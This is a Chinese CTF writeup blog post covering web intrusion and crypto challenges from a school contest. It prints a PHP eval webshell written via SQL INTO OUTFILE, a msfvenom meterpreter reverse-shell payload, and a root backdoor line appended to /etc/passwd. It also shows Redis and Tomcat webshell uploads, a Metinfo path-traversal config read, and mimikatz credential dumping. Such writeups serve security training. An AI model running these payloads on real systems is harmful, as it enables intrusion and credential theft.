<!DOCTYPE html><html lang="zh"><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black-translucent" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="description" content="Yumi"><title>Smuctfwp | phyb0x'Blog</title><link rel="stylesheet" type="text/css" href="/css/style.css?v=1.0.0"><link rel="stylesheet" type="text/css" href="//cdn.jsdelivr.net/npm/normalize.css/normalize.min.css"><link rel="stylesheet" type="text/css" href="//cdn.jsdelivr.net/npm/purecss/build/pure-min.min.css"><link rel="stylesheet" type="text/css" href="//cdn.jsdelivr.net/npm/purecss/build/grids-responsive-min.css"><link rel="stylesheet" href="//cdn.jsdelivr.net/npm/font-awesome@4.7.0/css/font-awesome.min.css"><script type="text/javascript" src="//cdn.jsdelivr.net/npm/jquery/dist/jquery.min.js"></script><link rel="icon" mask="" sizes="any" href="/favicon.ico"><link rel="Shortcut Icon" type="image/x-icon" href="/favicon.ico"><link rel="apple-touch-icon" href="/apple-touch-icon.png"><link rel="apple-touch-icon-precomposed" href="/apple-touch-icon.png"><link rel="alternate" type="application/atom+xml" href="/atom.xml"><script>var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = 'https://hm.baidu.com/hm.js?' + '407830c4543cf3fb1dd23c4a26528c03';
  var s = document.getElementsByTagName("script")[0];
  s.parentNode.insertBefore(hm, s);
  })();
</script><script type="text/javascript" src="//cdn.jsdelivr.net/npm/clipboard/dist/clipboard.min.js"></script><script type="text/javascript" src="//cdn.jsdelivr.net/gh/codeseven/toastr/build/toastr.min.js"></script><link rel="stylesheet" href="//cdn.jsdelivr.net/gh/codeseven/toastr/build/toastr.min.css"><meta name="generator" content="Hexo 5.4.0"></head><body><div class="body_container"><div id="header"><div class="site-name"><h1 class="hidden">Smuctfwp</h1><a id="logo" href="/.">phyb0x'Blog</a><p class="description">智能安全初学者</p></div><div id="nav-menu"><a class="current" href="/."><i class="fa fa-home"> Start</i></a><a href="/archives/"><i class="fa fa-archive"> Archiv</i></a><a href="/about/"><i class="fa fa-user"> Über</i></a><a href="/atom.xml"><i class="fa fa-rss"> RSS</i></a></div></div><div class="pure-g" id="layout"><div class="pure-u-1 pure-u-md-3-4"><div class="content_container"><div class="post"><h1 class="post-title">Smuctfwp</h1><div class="post-meta">2018-11-05<span> | </span><span class="category"><a href="/categories/CTF/">CTF</a></span><script src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" async></script><span id="busuanzi_container_page_pv"> | <span id="busuanzi_value_page_pv"></span><span> Hits</span></span><span class="post-time"><span class="post-meta-item-text"> | </span><span class="post-meta-item-icon"><i class="fa fa-keyboard-o"></i><span class="post-count"> 1.1k</span><span class="post-meta-item-text"> Words</span></span></span><span class="post-time"> | <span class="post-meta-item-icon"><i class="fa fa-clock-o"></i><span class="post-count"> 4</span><span class="post-meta-item-text"> Minutes</span></span></span></div><a class="disqus-comment-count" href="/2018/11/05/Smuctfwp/#vcomment"><span class="valine-comment-count" data-xid="/2018/11/05/Smuctfwp/"></span><span> Comment</span></a><div class="post-content"><h2 id="web"><a href="#web" class="headerlink" title="web"></a>web</h2><h3 id="100-sql"><a href="#100-sql" class="headerlink" title="100 sql"></a>100 sql</h3><p>简单sql注入</p>
<span id="more"></span>

<p>直接sqlmap跑 然后找到admin账号密码登录就行。<br> admin<br> asf451asf2154sa545<br>flag{2c8f358dc6241ea721fbea0361e130a3}</p>
<p><img src="https://i.imgur.com/AQqmHVf.png"></p>
<pre><code>python2 sqlmap.py -r 1.txt --technique T -p username -D test -t user -C &quot;username,password&quot; --dump
</code></pre>
<h3 id="phpmyadmin"><a href="#phpmyadmin" class="headerlink" title="phpmyadmin"></a>phpmyadmin</h3><h4 id="思路"><a href="#思路" class="headerlink" title="思路"></a>思路</h4><p>phpmyadmin前台爆破-&gt;读取apache配置文件找路径-&gt;写shell-&gt;提权-&gt;-&gt;抓密码-&gt;flag</p>
<p>弱密码爆破</p>
<p>phpmyadmin密码<br>root<br>root123456</p>
<p>默认路径被改，读取apache配置文件找路径</p>
<pre><code>SELECT load_file( &quot;C:/phpStudy/PHPTutorial/Apache/conf/httpd.conf&quot; )；
</code></pre>
<p><img src="https://i.imgur.com/BDzfJc0.png"></p>
<p>读取到web根目录写shell/修改日志记录getshell</p>
<pre><code>SELECT &#39;&lt;?php @eval($_POST[cmd])?&gt;&#39;
INTO OUTFILE &#39;C:/phpStudy/PHPTutorial/a6ds523d/shell.php&#39;；
</code></pre>
<p>拿到shell之后发现并没有对目录读写进行多大限制，权限为apache权限，进行提权。</p>
<p><img src="https://i.imgur.com/L5RWrV4.png"></p>
<p>生成上传msf木马,可以看到有执行权限，反弹msfshell。</p>
<pre><code>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.19.128 LPORT=444 -f exe -o 444.exe
</code></pre>
<p><img src="https://i.imgur.com/sBBaeHP.png"><br><img src="https://i.imgur.com/13N9K1v.png"></p>
<p>这么多随便用一个成功率高的就好。权限虽然是apache但是对目录运行读写权限并没有过多限制，随便来。</p>
<p>我直接用前段时间的2018-8120好用点。<br><img src="https://i.imgur.com/yAnaGCn.png"></p>
<p>可以看到直接用户是不行的，用8120添加成功并添加管理组。<br>目标机没有开启3389 </p>
<p><img src="https://i.imgur.com/dCMTmtN.png"></p>
<p>看到服务是开启的，那么因该是端口被修改了，找pid2244 最后发现是4399端口。</p>
<p><img src="https://i.imgur.com/KXvLl8o.png"><br>连接成功</p>
<p>mimikatz抓密码</p>
<p><img src="https://i.imgur.com/zQmDeuC.png"></p>
<p>解密 Administratorhash即为flag</p>
<p>apache Smuwelcome</p>
<p>fl4g  itsError</p>
<h3 id="0…day"><a href="#0…day" class="headerlink" title="0…day???"></a>0…day???</h3><p>数据库 </p>
<p>my<br>123456root</p>
<p>Smuadmin<br>Smuwahaha123</p>
<p>这题稍微有点坑</p>
<p><img src="https://i.imgur.com/jRqq9DX.png"></p>
<p>可以看到这边扫到了网站的备份</p>
<p>网站是phpcms的，常规思路也是直接就审计上了。</p>
<p>然而等着你的就是这个</p>
<p><img src="https://i.imgur.com/5E3mQAK.png"></p>
<p><img src="https://i.imgur.com/gwe1wWo.png"></p>
<p>真正的点就在这了 redis未授权访问 </p>
<p>ssh写公钥、计划任务弹shell已经被我限制了 直接写webshell</p>
<p><img src="https://i.imgur.com/x5vl2zm.png"></p>
<p>普通菜刀直接连接会报错</p>
<p><img src="https://i.imgur.com/H3nBKlT.png"></p>
<p>可以看到木马已经传上去了，命令也是能执行的</p>
<p><img src="https://i.imgur.com/m434Vrg.png"></p>
<p>但是PHP是高版本，高版本php7.0 过滤一些符号 删除了一些函数<br>我这里是用的java版连接  蚁剑应该也以</p>
<p><img src="https://i.imgur.com/b99n67e.png"></p>
<h3 id="垃圾小王吧"><a href="#垃圾小王吧" class="headerlink" title="垃圾小王吧"></a>垃圾小王吧</h3><p>Smuwelcome123</p>
<p>tomcat弱口令getshell -&gt; ssh流量转发 -</p>
<p>运维小王把flag落在没搭建好的环境里了，你能帮他找回吗？</p>
<p><img src="https://i.imgur.com/k2lCdYN.png"></p>
<p>弱口令 admin 123456</p>
<pre><code>jar -cvfM0 hello.war ./
</code></pre>
<p>马的内容打包成war上传<br>菜刀连接 root权限</p>
<p>连上去并没有什么信息，ifconfig下发现有内网网段<br>arp -a 发现ip 10.10.10.133</p>
<p><img src="https://i.imgur.com/t5Qyk3P.png"></p>
<p>nmap扫描扫到开放80 3306端口猜测开放web服务。<br>由于是server没有图形化界面，通过添加账号ssh转发流量到本地访问。</p>
<p>添加超级用户(没回显一句话添加)</p>
<pre><code>echo &quot;guest:x:0:0::/:/bin/sh&quot; &gt;&gt; /etc/passwd
echo &#39;guest:123456&#39;|chpasswd
</code></pre>
<p><img src="https://i.imgur.com/wcYmUNJ.png"><br>添加成功 root权限</p>
<p>本地做ssh流量转发<br><img src="https://i.imgur.com/bz4HQnq.png"></p>
<p>可以看到 curl出内容转发成功。本地访问发现是Metinfo6.1</p>
<p>Metinfo6.1-&gt;信息泄露读取数据库信息</p>
<pre><code>http://127.0.0.1:11/include/thumb.php?dir=http\..\..\config\config_db.php
</code></pre>
<p><img src="https://i.imgur.com/O1q56Ws.png"></p>
<pre><code>mysql -h 127.0.0.1 -P 20 -u root -pSmuwelcome
</code></pre>
<p><img src="https://i.imgur.com/qIkBItC.png"></p>
<p>拿到flag{87ef98219672a78c19bae7954fcd4114}</p>
<p>之后又增加了点难度 </p>
<p><img src="https://i.imgur.com/Wa7QVeR.png"></p>
<p>限制了端口，不过8080拿到shell后是root权限可以为所欲为自己操作吧。</p>
<h2 id="杂项密码"><a href="#杂项密码" class="headerlink" title="杂项密码"></a>杂项密码</h2><h3 id="十三姨穿花衣"><a href="#十三姨穿花衣" class="headerlink" title="十三姨穿花衣"></a>十三姨穿花衣</h3><pre><code>39293882298593559195834062835474883832957
</code></pre>
<p>十进制转字符串，然后rot3</p>
<p>flag{its-so-easy}</p>
<h3 id="LSB-娘子，啊哈？"><a href="#LSB-娘子，啊哈？" class="headerlink" title="LSB(娘子，啊哈？)"></a>LSB(娘子，啊哈？)</h3><p>zip爆破Ziperello</p>
<p>密码 2018114</p>
<p>解出图片</p>
<p>Stegsolve神器</p>
<p><img src="https://i.imgur.com/XZdVP9L.png"></p>
<p>有加密信息猜测是lsb隐写</p>
<p>以zip密码尝试分离</p>
<p><img src="https://i.imgur.com/CHTNSZs.png"></p>
<p>flag{72226ef09cf65b883508b2d9a8bec3a8}</p>
<h3 id="共模共计"><a href="#共模共计" class="headerlink" title="共模共计"></a>共模共计</h3><pre><code>n = 12163241791483524957316806288597760862288981689931968345271813765985026429745857
e1 = 11
e2 = 1264864681
c = 3079810359319238928727602198449362532122827974473968422037011227516212995430600
c2 = 1067676967051445848402525273436721484419308188939468918925696594850492013554433
</code></pre>
<p>脚本</p>
<pre><code># -*- coding: utf-8 -*-

from libnum import n2s,s2n
from gmpy2 import invert
# 欧几里得算法
def egcd(a, b):
  if a == 0:
return (b, 0, 1)
  else:
g, y, x = egcd(b % a, a)
return (g, x - (b // a) * y, y)

def main():
  n = 12163241791483524957316806288597760862288981689931968345271813765985026429745857
  c1 = 3079810359319238928727602198449362532122827974473968422037011227516212995430600
  c2 = 1067676967051445848402525273436721484419308188939468918925696594850492013554433
  e1 = 11
  e2 = 1264864681
  s = egcd(e1, e2)
  s1 = s[1]
  s2 = s[2]
  # 求模反元素
  if s1&lt;0:
s1 = - s1
c1 = invert(c1, n)
  elif s2&lt;0:
s2 = - s2
c2 = invert(c2, n)

  m = pow(c1,s1,n)*pow(c2,s2,n) % n
  print n2s(m)

if __name__ == &#39;__main__&#39;:
  main()
</code></pre>
<p>flag{just-s0-s0}</p>
<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>慌慌忙忙准备了一周，第一次做校外的邀请赛比赛中也是出现了很多问题，运维不好做啊！！！环境搭建好上线就出问题，尤其是几道弱密码需要爆破的。服务器也没做维护(虽然内网环境里封了端口到了服务器就没想到…差点被日)题目也是没有太大难度都是这段时间所学，总之师傅们太强了！一首凉凉送给自己。</p>
<p>最后说一句出题人也很不容易，请不要暴打出题人…</p>
</div><div id="donate"><link rel="stylesheet" type="text/css" href="/css/donate.css"><script type="text/javascript" src="/js/donate.js" successtext="Copy Successed!"></script><a class="pos-f tr3" id="github" target="_blank" rel="noopener" href="https://github.com/Kaiyuan/donate-page" arget="_blank" title="Github"></a><div id="DonateText">Donate</div><ul class="list pos-f" id="donateBox"><li id="AliPay" qr="/img/airpy.png"></li></ul><div class="pos-f left-100" id="QRBox"><div id="MainBox"></div></div></div><div class="tags"></div><div class="post-nav"><a class="pre" href="/2018/11/10/%E4%B8%9A%E5%8A%A1%E5%AE%89%E5%85%A8/">业务安全</a><a class="next" href="/2018/10/30/RSA/">RSA</a></div><div id="vcomment"></div><script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script><script src="//unpkg.com/valine@latest/dist/Valine.min.js"></script><script>var notify = 'false' == 'true' ? true : false;
var verify = 'false' == 'true' ? true : false;
var GUEST_INFO = ['nick','mail','link'];
var guest_info = 'nick,mail,link'.split(',').filter(function(item){
  return GUEST_INFO.indexOf(item) > -1
});
guest_info = guest_info.length == 0 ? GUEST_INFO :guest_info;
window.valine = new Valine({
  el:'#vcomment',
  notify:notify,
  verify:verify,
  appId:'MhBSauY8QdXDPd9mzDsCmUQ8-gzGzoHsz',
  appKey:'BwJxec1eCc5PCTXUcPKUHRl0',
  placeholder:'我就只是想看看，字都懒得打...',
  avatar:'mm',
  guest_info:guest_info,
  pageSize:'10'
})
</script></div></div></div><div class="pure-u-1-4 hidden_mid_and_down"><div id="sidebar"><div class="widget"><div class="widget-title"><i class="fa fa-folder-o"> Kategorien</i></div><ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/CTF/">CTF</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%9F%BA%E7%A1%80%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/">基础漏洞总结</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E8%84%9A%E6%9C%AC%E5%B7%A5%E5%85%B7/">脚本工具</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E8%BF%90%E7%BB%B4/">运维</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-star-o"> Tags</i></div><div class="tagcloud"></div></div><div class="widget"><div class="widget-title"><i class="fa fa-file-o"> Letzte</i></div><ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2021/08/05/%E7%89%B9%E5%BE%81%E5%B7%A5%E7%A8%8B(%E5%89%AF%E6%9C%AC)/">特征工程</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/20/%E8%BF%87Waf/">sql绕安全狗</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/17/weblogic%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E6%B1%87%E6%80%BB/">weblogic漏洞利用汇总</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/14/jsonp%E5%AE%89%E5%85%A8/">jsonp安全</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/12/29/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/">横向移动</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/12/28/ew%E5%A4%9A%E7%BA%A7%E8%BD%AC%E5%8F%91/">ew多级转发</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/12/28/ARP%E6%AC%BA%E9%AA%97/">ARP欺骗</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/12/25/SSRF%E6%B5%85%E6%9E%90/">SSRF浅析</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/12/23/xxe%E6%B5%85%E6%9E%90/">xxe浅析</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/12/21/win%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/">win权限维持</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-external-link"> Blogroll</i></div><ul></ul><a target="_blank"></a><ul></ul><a target="_blank"></a><ul></ul><a target="_blank"></a></div></div></div><div class="pure-u-1 pure-u-md-3-4"><div id="footer">Copyright © 2021 <a href="/." rel="nofollow">phyb0x'Blog.</a> Powered by<a rel="nofollow" target="_blank" href="https://hexo.io"> Hexo.</a><a rel="nofollow" target="_blank" href="https://github.com/tufu9441/maupassant-hexo"> Theme</a> by<a rel="nofollow" target="_blank" href="https://github.com/pagecho"> Cho.</a></div></div></div><a class="show" id="rocket" href="#top"></a><script type="text/javascript" src="/js/totop.js?v=1.0.0" async></script><script type="text/javascript" src="//cdn.jsdelivr.net/gh/fancyapps/fancybox/dist/jquery.fancybox.min.js" async></script><script type="text/javascript" src="/js/fancybox.js?v=1.0.0" async></script><link rel="stylesheet" type="text/css" href="//cdn.jsdelivr.net/gh/fancyapps/fancybox/dist/jquery.fancybox.min.css"><script type="text/javascript" src="/js/copycode.js" successtext="Copy Successed!"></script><link rel="stylesheet" type="text/css" href="/css/copycode.css"><script type="text/javascript" src="/js/codeblock-resizer.js?v=1.0.0"></script><script type="text/javascript" src="/js/smartresize.js?v=1.0.0"></script></div></body></html>